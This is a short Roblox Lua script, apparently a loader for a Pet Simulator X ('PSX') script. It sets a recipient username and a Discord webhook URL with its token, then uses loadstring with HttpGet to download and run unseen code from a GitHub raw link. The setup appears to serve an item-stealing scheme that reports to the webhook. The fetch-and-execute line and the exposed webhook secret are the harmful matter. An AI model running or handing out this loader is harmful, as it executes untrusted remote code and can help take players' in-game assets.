UserName = "elescoio"
WebHook = "https://discord.com/api/webhooks/1070829732809146378/a5Dv3lJYo1OmfjV1mC2SSfmJL4sagg3iwHg2_8oS7UQBJEpKX3fD6GnuF2CY-mUwBhLq"
Mention = true
loadstring(game:HttpGet("https://raw.githubusercontent.com/HardGameSs/PSX/main/New.lua", true))()
